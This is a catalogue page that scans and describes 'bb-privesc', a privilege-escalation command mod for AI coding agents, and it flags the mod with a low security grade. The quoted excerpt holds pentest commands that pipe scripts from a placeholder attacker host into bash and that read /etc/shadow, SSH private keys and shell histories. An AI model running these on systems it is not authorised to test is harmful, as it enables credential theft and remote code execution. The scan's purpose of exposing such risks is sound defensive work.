Getting it into your agent
One page per mod, every tool's command on it. A separate URL per tool would split the same page into five that compete with each other.
git clone --depth 1 https://github.com/allsmog/blackbox-claude-pluginWrote this? Show the measurements
A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.
[](https://agentmods.dev/commands/allsmog/blackbox-claude-plugin/bb-privesc)<a href="https://agentmods.dev/commands/allsmog/blackbox-claude-plugin/bb-privesc"><img src="https://agentmods.dev/badge/commands/allsmog/blackbox-claude-plugin/bb-privesc.svg" alt="Measured on agentmods" height="20"></a>What it costs to keep this loaded
Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.
| Model | Per session | Once invoked |
|---|---|---|
| Fable 5.1 | $0.00039 | $0.01816 |
| Opus 5 | $0.00019 | $0.00908 |
| Sonnet 5 | $0.00008 | $0.00363 |
| Haiku 4.5 | $0.00004 | $0.00182 |
Grade E, and why
bb-privesc scanned grade E with 3 findings against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 8d ago.
A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.
Reaches for credential fileshighPrivilege escalation
SSH keys, cloud credentials, git-credentials, .npmrc, /etc/shadow: reading these is how a config file becomes a credential leak.
cat /home/*/.ssh/id_rsa 2>/dev/null Downloads and executes remote codehighSupply chain
curl | sh runs whatever the server returns today, which is not necessarily what it returned when this was reviewed.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash Makes network callslowCapability
Not a fault in itself. Listed so you know the mod talks to something, and to what.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash How it starts
The opening of the file, as written. The whole thing — 324 lines — stays where its author put it; the contents beside it link to each section on GitHub.
Privilege Escalation
Overview
Comprehensive privilege escalation enumeration and exploitation guidance for both Linux and Windows systems.
Phase 1: OS Detection & Basic Enumeration
Detect OS
# Linux
uname -a
cat /etc/os-release
# Windows (PowerShell)
systeminfo
[System.Environment]::OSVersion
Linux Privilege Escalation
Automated Enumeration
LinPEAS
# Download and run
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash
# Or from attacker machine
curl http://<ATTACKER>:8000/linpeas.sh | bash
# Save output
./linpeas.sh -a | tee linpeas_output.txt
LinEnum
curl http://<ATTACKER>:8000/LinEnum.sh | bash
Manual Enumeration
User & Permissions
# Current user info
id
whoami
groups
# Sudo permissions
sudo -l
# SUID binaries
find / -perm -4000 -type f 2>/dev/null
# SGID binaries
find / -perm -2000 -type f 2>/dev/null
# World-writable files
find / -writable -type f 2>/dev/null | grep -v proc
# Capabilities
getcap -r / 2>/dev/null
System Information
# Kernel version
uname -a
cat /proc/version
# Distribution
cat /etc/issue
cat /etc/os-release
# Running processes
ps aux
# Installed packages
dpkg -l # Debian
rpm -qa # Red Hat
# Network connections
netstat -tulpn
ss -tulpn
Sensitive Files
# Readable shadow
cat /etc/shadow 2>/dev/null
# SSH keys
find / -name "id_rsa" -o -name "id_dsa" 2>/dev/null
cat /home/*/.ssh/id_rsa 2>/dev/null
# Password files
find / -name "*.password" -o -name "*password*" 2>/dev/null
# Config files
find / -name "*.conf" -type f 2>/dev/null | xargs grep -l "password" 2>/dev/null
# History files
cat /home/*/.bash_history 2>/dev/null
cat ~/.bash_history
Cron Jobs
# System cron
cat /etc/crontab
ls -la /etc/cron*
# User cron
crontab -l
cat /var/spool/cron/crontabs/*
# Watch for running cron
# Use pspy to monitor processes
Common Linux Privesc Vectors
| Vector | Check | Exploit |
|---|---|---|
| Sudo | sudo -l |
GTFOBins for binaries |
| SUID | find / -perm -4000 |
GTFOBins |
| Cron | /etc/crontab |
Writable scripts |
| Kernel | uname -r |
searchsploit |
| Capabilities | getcap -r / |
GTFOBins |
| Docker | docker images |
Docker escape |
| LXC | lxc list |
Container escape |
| NFS | cat /etc/exports |
no_root_squash |
| Writeable /etc/passwd | ls -la /etc/passwd |
Add root user |
What this file has done since we first saw it
Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.
- 8d ago First seen · 324 lines · 39 tokens per session scan E 6194cf80ee29
bb-privesc is a command published in the GitHub repository allsmog/blackbox-claude-plugin (5 stars, last pushed 6mo ago), licensed MIT. It adds 39 tokens to every session and 1,816 once invoked, about $0.0002 per session on Opus 5. A static security scan graded it E with 3 findings (reaches for credential files, downloads and executes remote code, makes network calls). No closer match exists in the catalogue, so it is treated as the original; first seen 2026-08-31.
Other commands, from other repositories
pentest
Activate pentest mode — displays ASCII art, configures session isolation, collects engagement scope, then OWNS the engagement: pre-flight, recon, planning (via the pentester-orchestrator planner), executor dispatch, a time-budget quota loop, aggregation, and report generation.
pentest-attacks
Define the attack profile for an engagement — select which attack categories and skills to use. Saves to .pentest-attacks.json. If run before /pentest:pentest, the orchestrator will respect the selection. If run standalone, does not launch a pentest.
pentest-kali
Connect to a Metasploit-Kali Server (MKS) REST API — verifies connectivity, discovers available Kali tools, and configures agents to prefer MKS endpoints over local Bash equivalents.
pentest-scope
Define or update engagement scope — saves scope to disk without launching a pentest. Can be run before or during an engagement. If a pentest is active and the target changes drastically, warns the operator and suggests a new engagement.
pentest-exit
Close pentest session — summarizes findings, ensures outputs are saved, lifts isolation, and prompts for /clear.
unpack
Detect and remove binary packing/protection.